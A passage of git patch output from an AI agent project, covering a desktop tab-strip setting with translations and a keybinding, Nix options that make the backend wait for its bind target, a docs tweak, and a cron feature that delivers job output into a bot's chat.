a.embedsAlways }, @@ -583,6 +591,21 @@ export function AppearanceSettings() { title={a.sessionDensityTitle} /> + { + triggerHaptic('selection') + setTabStripDefault(id) + }} + options={tabStripOptions} + value={tabStripDefault} + /> + } + description={a.tabStripDesc} + title={a.tabStripTitle} + /> + {/* Linux has neither half of this setting (see TRANSLUCENCY_SUPPORTED), so the row is absent there rather than offering a dead lever. */} {TRANSLUCENCY_SUPPORTED && ( diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 0ebe1d94bb..d8926ce09d 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -276,6 +276,7 @@ export const en: Translations = { 'view.toggleRightSidebar': 'Toggle file browser', 'view.toggleReview': 'Toggle review pane', 'view.toggleStatusbar': 'Toggle status bar', + 'view.toggleTabStrip': 'Toggle tabs', 'view.showFiles': 'Show file browser', 'view.showBrowser': 'Open browser', 'view.toggleHud': 'Toggle HUD mode', @@ -516,6 +517,11 @@ export const en: Translations = { sessionDensityCompact: 'Compact', sessionDensityComfortable: 'Comfortable', sessionDensityDetailed: 'Detailed', + tabStripTitle: 'Tab Strip', + tabStripDesc: 'Show tabs above a zone. Auto hides them when a zone holds a single pane.', + tabStripAuto: 'Auto', + tabStripAlways: 'Always', + tabStripNever: 'Never', terminalFontTitle: 'Terminal Font', terminalFontDesc: 'Choose an installed font for Desktop terminals. Nerd Fonts render Powerlevel10k and shell icons; leave blank to use bundled JetBrains Mono.', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index de86d2e0bd..5868fca013 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -340,6 +340,11 @@ export const ja = defineLocale({ sessionDensityCompact: 'コンパクト', sessionDensityComfortable: '標準', sessionDensityDetailed: '詳細', + tabStripTitle: 'タブバー', + tabStripDesc: 'ゾーンの上にタブを表示します。自動ではペインが1つのときに隠します。', + tabStripAuto: '自動', + tabStripAlways: '常に表示', + tabStripNever: '表示しない', terminalFontTitle: 'ターミナルフォント', terminalFontDesc: 'Desktop のターミナルで使用するインストール済みフォントを選びます。Nerd Font は Powerlevel10k とシェルアイコンを表示できます。空欄では内蔵の JetBrains Mono を使用します。', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index 5716503fb7..61ef0bbc04 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -415,6 +415,11 @@ export interface Translations { sessionDensityCompact: string sessionDensityComfortable: string sessionDensityDetailed: string + tabStripTitle: string + tabStripDesc: string + tabStripAuto: string + tabStripAlways: string + tabStripNever: string terminalFontTitle: string terminalFontDesc: string terminalFontPlaceholder: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index 2c3513f09b..b2317b4ea1 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -332,6 +332,11 @@ export const zhHant = defineLocale({ sessionDensityCompact: '緊湊', sessionDensityComfortable: '舒適', sessionDensityDetailed: '詳細', + tabStripTitle: '分頁列', + tabStripDesc: '在分區上方顯示分頁。自動模式會在分區只有一個面板時隱藏分頁。', + tabStripAuto: '自動', + tabStripAlways: '一律', + tabStripNever: '永不', terminalFontTitle: '終端機字型', terminalFontDesc: '選擇已安裝的字型用於桌面端終端機。Nerd Font 可正確顯示 Powerlevel10k 與 Shell 圖示;留空則使用內建的 JetBrains Mono。', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index db8866b7e3..66585070a4 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -271,6 +271,7 @@ export const zh: Translations = { 'view.toggleRightSidebar': '切换文件浏览器', 'view.toggleReview': '切换审查面板', 'view.toggleStatusbar': '切换状态栏', + 'view.toggleTabStrip': '切换标签', 'view.showFiles': '显示文件浏览器', 'view.showBrowser': '打开浏览器', 'view.showTerminal': '显示终端', @@ -505,6 +506,11 @@ export const zh: Translations = { sessionDensityCompact: '紧凑', sessionDensityComfortable: '舒适', sessionDensityDetailed: '详细', + tabStripTitle: '标签栏', + tabStripDesc: '在分区上方显示标签。自动模式会在分区只有一个面板时隐藏标签。', + tabStripAuto: '自动', + tabStripAlways: '始终', + tabStripNever: '从不', terminalFontTitle: '终端字体', terminalFontDesc: '选择已安装的字体用于桌面端终端。Nerd Font 可正确显示 Powerlevel10k 和 Shell 图标;留空则使用内置的 JetBrains Mono。', diff --git a/apps/desktop/src/lib/icons.ts b/apps/desktop/src/lib/icons.ts index 54cac8d185..6d20b50d16 100644 --- a/apps/desktop/src/lib/icons.ts +++ b/apps/desktop/src/lib/icons.ts @@ -86,6 +86,7 @@ import { IconPalette as Palette, IconLayoutBottombar as PanelBottom, IconLayoutSidebar as PanelLeftIcon, + IconLayoutNavbar as PanelTop, IconPlayerPause as Pause, IconPaw as PawPrint, IconPencil as Pencil, @@ -215,6 +216,7 @@ export { Palette, PanelBottom, PanelLeftIcon, + PanelTop, Pause, PawPrint, Pencil, diff --git a/apps/desktop/src/lib/keybinds/actions.ts b/apps/desktop/src/lib/keybinds/actions.ts index fd9527df19..f6bd021573 100644 --- a/apps/desktop/src/lib/keybinds/actions.ts +++ b/apps/desktop/src/lib/keybinds/actions.ts @@ -122,6 +122,12 @@ export const KEYBIND_ACTIONS: readonly KeybindActionMeta[] = [ // gap in their View family) and Hermes has no chord dispatcher, so this // takes the nearest free single combo instead of a ⌘K ⌘S two-stroke. { id: 'view.toggleStatusbar', category: 'view', defaults: ['mod+shift+s'] }, + // ⌥⌘T — "t" for tabs, reaching past ⇧ because ⌘⇧T is reopen-closed-tab + // everywhere. Ships BOUND, unlike VS Code's settings-only tab-bar switch: + // here the hide can take away every other affordance the zone had, so the + // way back has to already exist. (⌥+letter emits a symbol on macOS; the + // binding resolves through KeyT via comboFromEvent's `event.code` fallback.) + { id: 'view.toggleTabStrip', category: 'view', defaults: ['mod+alt+t'] }, // ⌘G — "g" for git; the review pane is the source-control view. { id: 'view.toggleReview', category: 'view', defaults: ['mod+g'] }, { id: 'view.showFiles', category: 'view', defaults: [] }, From fd3a783a3edbbda611cbc4e38d70202dca7b5852 Mon Sep 17 00:00:00 2001 From: ethernet Date: Fri, 21 Aug 2026 14:05:18 -0400 Subject: [PATCH 029/161] feat(nix): wait for the backend bind target before it starts MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The backend binds to `backend.host` immediately. The bind fails when the target is not ready, because uvicorn cannot bind a name that does not resolve, or an address that no interface holds. A unit that starts at boot loses this race against the daemon that supplies the target, such as tailscaled. A bind to a Tailscale MagicDNS name shows the problem. The name is the correct bind target, because the dashboard refuses each request with a Host header that is different from the address that the server bound to, and a shared machine has a different address in each tailnet. But the name does not resolve until tailscaled is up, so the unit fails at each boot until `Restart=on-failure` finds the moment when the name works. A systemd user unit cannot order itself after a system unit. `After=` and `Requires=` are silent no-ops across that boundary. Thus the wait is a poll, and not a dependency. This change adds three options to `services.hermes-agent.backend` on both the NixOS module and the Home Manager module: - `waitFor` — `null` (the default, unchanged behavior), `"hostname"`, or `"interface"` - `interfaceName` — the interface to take the address from - `waitTimeout` — the time in seconds before the unit stops With `waitFor`, ExecStart becomes a launcher that polls for the target and then execs hermes. `exec` keeps hermes as the MainPID, so the restart logic of systemd sees the real process. A timeout stops the unit with an error. It does not bind a fallback address, because a fallback can expose the backend more widely than the user intends. The default is not changed. Without `waitFor`, ExecStart is the same command line as before. --- nix/checks.nix | 110 +++++++++++++++++++++++- nix/homeManagerModules.nix | 18 +++- nix/moduleCommon.nix | 169 ++++++++++++++++++++++++++++++++++++- nix/nixosModules.nix | 6 +- 4 files changed, 294 insertions(+), 9 deletions(-) diff --git a/nix/checks.nix b/nix/checks.nix index 4ec3b7713c..f353b6942b 100644 --- a/nix/checks.nix +++ b/nix/checks.nix @@ -435,6 +435,109 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) '' ); + # ── How the backend waits for its bind target ──────────────────── + # The backend binds to `host` immediately by default. A unit that + # starts at boot can lose the race against the daemon that supplies + # the address, such as tailscaled. `backend.waitFor` puts a poll in + # front of the bind. This check proves three properties: the default + # keeps the direct command line, each wait mode makes a launcher that + # polls and then execs hermes, and the assertions reject a + # configuration that cannot work. + backend-bind-wait = + let + execOf = + settings: + (evalNixosModule ({ enable = true; } // settings)).config.systemd.services.hermes-backend.serviceConfig.ExecStart; + + direct = execOf { backend.mode = "serve"; }; + + hostnameWait = execOf { + backend = { + mode = "serve"; + host = "host.example.ts.net"; + waitFor = "hostname"; + }; + }; + + interfaceWait = execOf { + backend = { + mode = "dashboard"; + waitFor = "interface"; + interfaceName = "tailscale0"; + waitTimeout = 30; + }; + }; + + # The launcher is a store path. Read it to see what it runs. + hostnameScript = builtins.readFile hostnameWait; + interfaceScript = builtins.readFile interfaceWait; + + evalFails = + settings: + !(builtins.tryEval ( + lib.deepSeq + (evalNixosModule ({ enable = true; } // settings)).config.system.build.toplevel.drvPath + true + )).success; + + failures = + # The default must not change. + lib.optional (!lib.hasInfix "bin/hermes serve --host 127.0.0.1" direct) + "without waitFor the backend must exec hermes directly, got: ${direct}" + ++ lib.optional (lib.hasInfix "hermes-backend-launch" direct) + "without waitFor the backend must not use the launcher" + + # The hostname mode polls the resolver, then binds the name. + ++ lib.optional (!lib.hasInfix "hermes-backend-launch" hostnameWait) + "waitFor = hostname must run the launcher, got: ${hostnameWait}" + ++ lib.optional (!lib.hasInfix "getent hosts" hostnameScript) + "the hostname launcher must poll with getent" + ++ lib.optional (!lib.hasInfix "host.example.ts.net" hostnameScript) + "the hostname launcher must poll for backend.host" + ++ lib.optional (!lib.hasInfix "exec " hostnameScript) + "the launcher must exec hermes, so that it keeps the MainPID" + ++ lib.optional (!lib.hasInfix ''--host "$_target"'' hostnameScript) + "the launcher must bind the address that the poll resolved" + + # The interface mode reads an address off the interface. + ++ lib.optional (!lib.hasInfix "tailscale0" interfaceScript) + "the interface launcher must poll backend.interfaceName" + ++ lib.optional (!lib.hasInfix "_timeout=30" interfaceScript) + "the launcher must use backend.waitTimeout" + ++ lib.optional (!lib.hasInfix "bin/hermes dashboard" interfaceScript) + "the launcher must keep backend.mode" + + # The assertions reject what cannot work. + ++ + lib.optional + (!evalFails { + backend = { + mode = "serve"; + waitFor = "interface"; + }; + }) + "an assertion must reject waitFor = interface without interfaceName" + ++ + lib.optional + (!evalFails { + backend = { + mode = "serve"; + interfaceName = "tailscale0"; + }; + }) + "an assertion must reject interfaceName without waitFor = interface"; + in + pkgs.runCommand "hermes-backend-bind-wait" { } ( + if failures != [ ] then + throw "backend bind wait check failed:\n${lib.concatMapStringsSep "\n" (f: " - ${f}") failures}" + else + '' + echo "PASS: backend bind wait (default, hostname, interface)" + mkdir -p $out + echo "ok" > $out/result + '' + ); + # ── How .env is built ──────────────────────────────────────────── # This check runs the real script that both modules use to build # $HERMES_HOME/.env. The important property is that a second run @@ -523,6 +626,9 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) host = "127.0.0.1"; port = 9119; extraArgs = [ ]; + waitFor = null; + interfaceName = null; + waitTimeout = 120; }; }; sentinel = "--hermes-nix-argv-probe"; @@ -555,8 +661,8 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) } check "gateway" ${probe (common.gatewayArgv (cfgFor "none"))} - check "serve" ${probe (common.backendArgv (cfgFor "serve"))} - check "dashboard" ${probe (common.backendArgv (cfgFor "dashboard"))} + check "serve" ${probe (common.backendArgv { inherit pkgs; cfg = cfgFor "serve"; })} + check "dashboard" ${probe (common.backendArgv { inherit pkgs; cfg = cfgFor "dashboard"; })} mkdir -p $out echo "ok" > $out/result diff --git a/nix/homeManagerModules.nix b/nix/homeManagerModules.nix index 55b934672c..efaf9d7af4 100644 --- a/nix/homeManagerModules.nix +++ b/nix/homeManagerModules.nix @@ -186,7 +186,19 @@ inherit cfg; opt = options.services.hermes-agent.workingDirectory; optionPath = "services.hermes-agent"; - }; + } + ++ common.backendBindAssertions { + inherit cfg; + optionPath = "services.hermes-agent"; + } + ++ [ + { + # The interface poll reads `ip`, which iproute2 supplies on + # Linux only. + assertion = !isDarwin || cfg.backend.waitFor != "interface"; + message = "services.hermes-agent.backend.waitFor = \"interface\" works on Linux only. Use \"hostname\" on Darwin."; + } + ]; } # ── Packages and interactive-shell environment ───────────────── @@ -237,7 +249,7 @@ (lib.mkIf (isLinux && cfg.backend.mode != "none") { systemd.user.services.hermes-backend = mkUnit { description = common.backendDescription cfg; - argv = common.backendArgv cfg; + argv = common.backendArgv { inherit pkgs cfg; }; }; }) @@ -251,7 +263,7 @@ (lib.mkIf (isDarwin && cfg.backend.mode != "none") { launchd.agents.hermes-backend = mkAgent { - argv = common.backendArgv cfg; + argv = common.backendArgv { inherit pkgs cfg; }; logName = "hermes-backend"; }; }) diff --git a/nix/moduleCommon.nix b/nix/moduleCommon.nix index c021209123..5ea5b50e2c 100644 --- a/nix/moduleCommon.nix +++ b/nix/moduleCommon.nix @@ -540,6 +540,70 @@ let header that is different from the address that the server bound to. This is a defence against DNS rebinding. Bind to the name or the address that your clients use. + + If the name or the address is not available when the unit starts, + set `waitFor` as well. + ''; + }; + + waitFor = mkOption { + type = types.nullOr ( + types.enum [ + "hostname" + "interface" + ] + ); + default = null; + description = '' + Wait for the bind target before the backend starts. + + The backend binds to `host` immediately by default. The bind fails + when the target is not ready, because uvicorn cannot bind a name + that does not resolve, or an address that no interface holds. A + unit that starts at boot can lose this race against the daemon + that supplies the target, such as tailscaled or a VPN client. + + A systemd user unit cannot order itself after a system unit. + `After=` and `Requires=` are silent no-ops across that boundary. + Thus the wait is a poll, and not a dependency. + + The values are: + + - `null` — bind immediately. `Restart=on-failure` retries the unit + until the target is ready. + - `"hostname"` — poll until `host` resolves, then bind to `host`. + Use this for a name, such as a Tailscale MagicDNS name. + - `"interface"` — poll until `interfaceName` has an IPv4 address, + then bind to that address. Use this when the address changes, + and a name for it does not exist. + + CAUTION: The `"interface"` value ignores `host`. The unit binds to + the address of the interface. + ''; + example = "hostname"; + }; + + interfaceName = mkOption { + type = types.nullOr types.str; + default = null; + description = '' + The interface to take the bind address from. + + This option is necessary when `waitFor` is `"interface"`, and it + has no effect for the other values. + ''; + example = "tailscale0"; + }; + + waitTimeout = mkOption { + type = types.ints.positive; + default = 120; + description = '' + The time in seconds to wait for the bind target. + + The unit stops with an error after this time. It does not bind to + a different address, because a fallback address can expose the + backend more widely than you intend. ''; }; @@ -783,13 +847,14 @@ let ] ++ cfg.extraArgs; - backendArgv = - cfg: + # The command line of the backend, without the wait. + backendCommand = + cfg: host: [ "${effectivePackage cfg}/bin/hermes" cfg.backend.mode "--host" - cfg.backend.host + host "--port" (toString cfg.backend.port) # CAUTION: A service must not try to open a browser when it starts. @@ -797,6 +862,89 @@ let ] ++ cfg.backend.extraArgs; + # The launcher that waits for the bind target, then starts the backend. + # + # `exec` on the last line keeps hermes as the MainPID of the unit. No shell + # stays in the cgroup, and the restart logic of systemd sees the real + # process. + backendLauncher = + { pkgs, cfg }: + # The bind address is known only at start time, but escapeShellArgs quotes + # each argument. Thus the command line is built with a placeholder, and the + # placeholder becomes the shell variable after the quoting. + pkgs.writeShellScript "hermes-backend-launch" ( + builtins.replaceStrings [ "@HOST@" ] [ ''"$_target"'' ] '' + set -euo pipefail + + _timeout=${toString cfg.backend.waitTimeout} + _waited=0 + + ${ + if cfg.backend.waitFor == "hostname" then + '' + _target=${lib.escapeShellArg cfg.backend.host} + _how="hostname" + + while :; do + if ${pkgs.getent}/bin/getent hosts "$_target" >/dev/null 2>&1; then + break + fi + + if [ "$_waited" -ge "$_timeout" ]; then + echo "hermes-backend: '$_target' did not resolve after ''${_timeout}s. The unit stops." >&2 + exit 1 + fi + + if [ "$_waited" = 0 ]; then + echo "hermes-backend: waits for '$_target' to resolve..." >&2 + fi + ${pkgs.coreutils}/bin/sleep 2 + _waited=$(( _waited + 2 )) + done + '' + else + '' + _iface=${lib.escapeShellArg cfg.backend.interfaceName} + _how="interface $_iface" + + while :; do + _target="$(${pkgs.iproute2}/bin/ip -4 -oneline addr show dev "$_iface" 2>/dev/null \ + | ${pkgs.gawk}/bin/awk '{print $4}' \ + | ${pkgs.coreutils}/bin/cut -d/ -f1 \ + | ${pkgs.coreutils}/bin/head -n1 || true)" + + if [ -n "''${_target:-}" ]; then + break + fi + + if [ "$_waited" -ge "$_timeout" ]; then + echo "hermes-backend: interface '$_iface' had no IPv4 address after ''${_timeout}s. The unit stops." >&2 + echo "hermes-backend: a fallback address can expose the backend more widely than you intend." >&2 + exit 1 + fi + + if [ "$_waited" = 0 ]; then + echo "hermes-backend: waits for an IPv4 address on '$_iface'..." >&2 + fi + ${pkgs.coreutils}/bin/sleep 2 + _waited=$(( _waited + 2 )) + done + '' + } + + echo "hermes-backend: binds to $_target:${toString cfg.backend.port} (from $_how)" >&2 + + exec ${lib.escapeShellArgs (backendCommand cfg "@HOST@")} + '' + ); + + backendArgv = + { pkgs, cfg }: + if cfg.backend.waitFor == null then + backendCommand cfg cfg.backend.host + else + [ "${backendLauncher { inherit pkgs cfg; }}" ]; + backendDescription = cfg: if cfg.backend.mode == "dashboard" then @@ -884,6 +1032,20 @@ let } ]; + # The backend wait needs an interface name when it polls an interface. + backendBindAssertions = + { cfg, optionPath }: + [ + { + assertion = cfg.backend.waitFor != "interface" || cfg.backend.interfaceName != null; + message = "${optionPath}.backend.interfaceName must be set when backend.waitFor is \"interface\"."; + } + { + assertion = cfg.backend.waitFor == "interface" || cfg.backend.interfaceName == null; + message = "${optionPath}.backend.interfaceName has no effect unless backend.waitFor is \"interface\"."; + } + ]; + # The subdirectories of HERMES_HOME that both modules make. stateSubdirs = [ "cron" @@ -896,6 +1058,7 @@ in { inherit backendArgv + backendBindAssertions backendDescription deepConfigType effectivePackage diff --git a/nix/nixosModules.nix b/nix/nixosModules.nix index 38af2ec5ed..0a3182d640 100644 --- a/nix/nixosModules.nix +++ b/nix/nixosModules.nix @@ -381,6 +381,10 @@ opt = options.services.hermes-agent.workingDirectory; optionPath = "services.hermes-agent"; } + ++ common.backendBindAssertions { + inherit cfg; + optionPath = "services.hermes-agent"; + } ++ [ { # Container mode runs one command in one container. A second @@ -574,7 +578,7 @@ environment = commonUnitEnvironment; serviceConfig = commonServiceConfig // { - ExecStart = lib.escapeShellArgs (common.backendArgv cfg); + ExecStart = lib.escapeShellArgs (common.backendArgv { inherit pkgs cfg; }); }; path = unitPath; From f8cbf5432ebabf6857c4a8ba8249e42581caf1c6 Mon Sep 17 00:00:00 2001 From: Michael Vorburger Date: Fri, 21 Aug 2026 20:19:17 +0200 Subject: [PATCH 030/161] docs: Add Nix/NixOS to installation link description --- website/docs/index.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/website/docs/index.mdx b/website/docs/index.mdx index 29c90a267f..a4f248e8ae 100644 --- a/website/docs/index.mdx +++ b/website/docs/index.mdx @@ -111,7 +111,7 @@ It's not a coding copilot tethered to an IDE or a chatbot wrapper around a singl | | | | ----------------------------------------------------------------------- | --------------------------------------------------------------------- | -| 🚀 **[Installation](/getting-started/installation)** | Install in 60 seconds on Linux, macOS, WSL2, native Windows, or Android | +| 🚀 **[Installation](/getting-started/installation)** | Install in 60 seconds on Linux, macOS, WSL2, native Windows, Nix & NixOS or Android | | 📖 **[Quickstart Tutorial](/getting-started/quickstart)** | Your first conversation and key features to try | | 🗺️ **[Learning Path](/getting-started/learning-path)** | Find the right docs for your experience level | | ⚙️ **[Configuration](/user-guide/configuration)** | Config file, providers, models, and options | From b102999d8013a77c555ba481829e97dc6232158b Mon Sep 17 00:00:00 2001 From: ethernet Date: Fri, 21 Aug 2026 15:00:27 -0400 Subject: [PATCH 031/161] add mike@vorburger.ch to contributors --- contributors/emails/mike@vorburger.ch | 1 + 1 file changed, 1 insertion(+) create mode 100644 contributors/emails/mike@vorburger.ch diff --git a/contributors/emails/mike@vorburger.ch b/contributors/emails/mike@vorburger.ch new file mode 100644 index 0000000000..ca8b35044d --- /dev/null +++ b/contributors/emails/mike@vorburger.ch @@ -0,0 +1 @@ +vorburger From a2da0ab797edf5e7ca7d3f64591facbbc37ec7f2 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 04:38:21 -0700 Subject: [PATCH 032/161] =?UTF-8?q?feat(cron):=20bot-chat=20delivery=20tar?= =?UTF-8?q?get=20=E2=80=94=20cron=20output=20lands=20in=20a=20bot's=20cano?= =?UTF-8?q?nical=20Bot=20Chat=20and=20the=20bot=20responds?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit deliver='bot-chat[:]' is a machine-local pseudo-platform: the scheduler delivers job output as a real inbound turn in the target profile's canonical Bot Chat via the chat CLI lane (--in ~ -c "Bot Chat" --create-if-missing -Q --query-file), the same lane Bot Mode agent-to-agent messages use. The bot reads the output, acts on it, and responds in its chat — instead of the output only landing in Run history. - cron/scheduler.py: token parsing, target resolution (own profile / named local profile / unknown -> skipped with warning), subprocess delivery lane with cron.bot_chat_delivery_timeout_seconds (default 600s), preflight exemption, and bot-chat entries in cron_delivery_targets() for UI pickers. Excluded from 'all' by design. - tools/cronjob_tools.py: create/update-time validation — named profiles must exist on this machine (fail at create, not at 3am); deliver schema documents the new token. - tui_gateway/methods_tools.py: cron.manage add forwards deliver. - hermes_cli/profiles.py: list_profile_names() cheap name-only scan. - hermes-bots plugin: Create Cronjob dialog gains a 'Send results to' picker (Run history only / 's chat); bot-chat jobs send the BARE token on the profile-scoped create so Desktop-side aliases can never name a profile the backend doesn't have. - Docs: user cron guide, automate-with-cron, cron-internals. Machine-local by construction: names resolve only against the executing machine's ~/.hermes/profiles/, so overlapping profile names across multiple connected gateways are unambiguous. --- .../desktop/src/plugins/hermes-bots/plugin.js | 19 +- .../tests/routine-deliver-target.test.mjs | 31 +++ cron/scheduler.py | 223 ++++++++++++++++++ hermes_cli/profiles.py | 19 ++ hermes_cli/subcommands/cron.py | 6 +- tests/cron/test_cron_bot_chat_delivery.py | 216 +++++++++++++++++ tools/cronjob_tools.py | 45 +++- tui_gateway/methods_tools.py | 5 + .../docs/developer-guide/cron-internals.md | 3 + website/docs/guides/automate-with-cron.md | 22 ++ website/docs/user-guide/features/cron.md | 23 ++ 11 files changed, 609 insertions(+), 3 deletions(-) create mode 100644 apps/desktop/src/plugins/hermes-bots/tests/routine-deliver-target.test.mjs create mode 100644 tests/cron/test_cron_bot_chat_delivery.py diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index f0d84a315a..07b3df6e54 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -8935,6 +8935,11 @@ function CreateRoutineDialog({ bot, open, onClose }) { const [instruction, setInstruction] = useState('') const [sched, setSched] = useState(defaultScheduleState()) const [continuity, setContinuity] = useState(false) + // Where the run's output lands: 'history' = the run session only (Run + // history / cron page, today's behavior); 'bot-chat' = inject into this + // bot's canonical Bot Chat as a real message — the bot reads it, acts on + // it, and responds there (costs the bot one agent turn per run). + const [target, setTarget] = useState('history') const [busy, setBusy] = useState(false) const [error, setError] = useState(null) const activeProfile = useValue(host.state.profile) @@ -8945,6 +8950,7 @@ function CreateRoutineDialog({ bot, open, onClose }) { setInstruction('') setSched(defaultScheduleState()) setContinuity(false) + setTarget('history') setBusy(false) setError(null) } @@ -8978,7 +8984,11 @@ function CreateRoutineDialog({ bot, open, onClose }) { prompt: routinePrompt(bot, title, task, activeProfile), ...(bot ? { profile: bot } : {}), ...(repeatN ? { repeat: repeatN } : {}), - ...(continuity ? { continuity: true } : {}) + ...(continuity ? { continuity: true } : {}), + // 'bot-chat' (bare, no name): the job is created IN the bot's own + // cron store (profile scoping above), so the scheduler resolves the + // token to that profile — no cross-gateway name ambiguity possible. + ...(target === 'bot-chat' ? { deliver: 'bot-chat' } : {}) }) await invalidateRoutineOwner(bot) host.notify({ kind: 'success', message: `Cronjob "${title}" scheduled` }) @@ -9031,6 +9041,13 @@ function CreateRoutineDialog({ bot, open, onClose }) { }) ), labeled('When to run', jsx(SchedulePicker, { state: sched, setState: setSched })), + labeled( + 'Send results to', + pickerSelect(target, setTarget, [ + { id: 'history', label: 'Run history only' }, + { id: 'bot-chat', label: `${displayName({ name: bot }, $botMeta.get()[bot])}\u2019s chat (bot responds)` } + ]) + ), jsxs('label', { className: 'flex items-center gap-2 text-xs text-(--ui-text-tertiary) cursor-pointer select-none', children: [ diff --git a/apps/desktop/src/plugins/hermes-bots/tests/routine-deliver-target.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/routine-deliver-target.test.mjs new file mode 100644 index 0000000000..4e4fe79d0c --- /dev/null +++ b/apps/desktop/src/plugins/hermes-bots/tests/routine-deliver-target.test.mjs @@ -0,0 +1,31 @@ +import assert from 'node:assert/strict' +import { readFileSync } from 'node:fs' +import test from 'node:test' + +// The Create Cronjob dialog's "Send results to" target picker: source-shape +// tests in the style of the sibling routine tests (the plugin is a single +// direct file; behavior contracts are pinned via source assertions where a +// full DOM harness would be heavier than the seam warrants). +const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') + +test('dialog offers a delivery target picker with history and bot-chat options', () => { + assert.match(pluginSource, /Send results to/) + assert.match(pluginSource, /id: 'history', label: 'Run history only'/) + assert.match(pluginSource, /id: 'bot-chat'/) +}) + +test('bot-chat target sends the BARE deliver token on the profile-scoped create', () => { + // The job is created in the bot's own cron store (profile: bot), so the + // bare token resolves to that profile machine-locally — a named token + // built from a Desktop-side alias could name a profile the backend does + // not have (the #82530 alias trap). Pin the bare form. + assert.match(pluginSource, /\.\.\.\(target === 'bot-chat' \? \{ deliver: 'bot-chat' \} : \{\}\)/) + assert.doesNotMatch(pluginSource, /deliver: `bot-chat:\$\{/) +}) + +test('history target (default) sends no deliver param — behavior unchanged', () => { + assert.match(pluginSource, /useState\('history'\)/) + // reset() returns the picker to the default so a reopened dialog never + // inherits the previous create's target. + assert.match(pluginSource, /setTarget\('history'\)/) +}) diff --git a/cron/scheduler.py b/cron/scheduler.py index dd82623ea1..082cdaedd1 100644 --- a/cron/scheduler.py +++ b/cron/scheduler.py @@ -2254,6 +2254,25 @@ def cron_delivery_targets() -> list[dict]: "home_env_var": env_var or None, } ) + + # Bot Chat targets: one per local profile. Machine-local by design (the + # scheduler delivers via a local chat subprocess), so the names listed + # here are exactly the names that resolve at fire time — no gateway + # config, no home channel needed. + try: + from hermes_cli.profiles import list_profile_names + + for profile_name in list_profile_names(): + targets.append( + { + "id": f"{BOT_CHAT_PLATFORM}:{profile_name}", + "name": f"Bot Chat ({profile_name})", + "home_target_set": True, + "home_env_var": None, + } + ) + except Exception: + logger.debug("cron_delivery_targets: profile listing unavailable", exc_info=True) return targets @@ -2295,6 +2314,13 @@ def _resolve_single_delivery_target(job: dict, deliver_value: str) -> Optional[d if deliver_value == "local": return None + # bot-chat[:] — checked before the generic platform:chat_id + # split below so the profile-name argument is never misparsed as a + # chat_id on an unknown platform. + bot_chat_profile = parse_bot_chat_deliver_token(deliver_value) + if bot_chat_profile is not None: + return _resolve_bot_chat_target(job, bot_chat_profile) + if deliver_value == "origin": if origin: return { @@ -2390,6 +2416,126 @@ def _resolve_single_delivery_target(job: dict, deliver_value: str) -> Optional[d } +def _get_bot_chat_delivery_timeout() -> int: + """Timeout for one bot-chat delivery turn (the target bot runs a full + agent turn on the injected output, so this is minutes, not seconds). + + ``cron.bot_chat_delivery_timeout_seconds`` in config.yaml; default 600. + """ + try: + cfg = load_config() + value = int(cfg.get("cron", {}).get("bot_chat_delivery_timeout_seconds", 600)) + return value if value > 0 else 600 + except Exception: + return 600 + + +def _deliver_to_bot_chat(job: dict, content: str, profile: str) -> Optional[str]: + """Deliver job output into a profile's canonical Bot Chat as an inbound turn. + + Runs ``hermes [-p ] chat --in ~ -c "Bot Chat" --create-if-missing + -Q --query-file `` — the exact lane Bot Mode agent-to-agent messages + use, so the adopt-before-mint canonical-session rules apply and the target + bot receives the output as a real user-role message it can act on. + Alternation-safe by construction: this is an inbound turn on the chat + command lane, not a transcript splice. + + ``profile`` is ``""`` for the job's own profile (subprocess inherits this + scheduler's HERMES_HOME) or a validated local profile name. Returns None + on success or an error string for ``last_delivery_error``. + """ + import shutil as _shutil + import tempfile + + job_id = job.get("id", "?") + job_name = job.get("name", job_id) + + hermes_bin = _shutil.which("hermes") + if hermes_bin: + argv = [hermes_bin] + else: + try: + import importlib.util as _ilu + + if _ilu.find_spec("hermes_cli") is not None: + argv = [sys.executable, "-m", "hermes_cli.main"] + else: + return "bot-chat delivery failed: hermes CLI not resolvable" + except Exception: + return "bot-chat delivery failed: hermes CLI not resolvable" + + env = os.environ.copy() + if profile: + argv += ["-p", profile] + # -p owns profile resolution in the child; a leftover HERMES_HOME + # from THIS scheduler's profile must not shadow it. + env.pop("HERMES_HOME", None) + + # The prefix tells the receiving bot this is scheduled output, not the + # human typing — mirrors the Bot Mode sender-attribution convention. + message = ( + f'[Cronjob "{job_name}" output — scheduled job, not the user. ' + f"Review it, act on anything that needs action, and summarize " + f"for the chat.]\n\n{content}" + ) + + query_file = None + try: + with tempfile.NamedTemporaryFile( + "w", encoding="utf-8", suffix=".txt", prefix="hermes-cron-botchat-", + delete=False, + ) 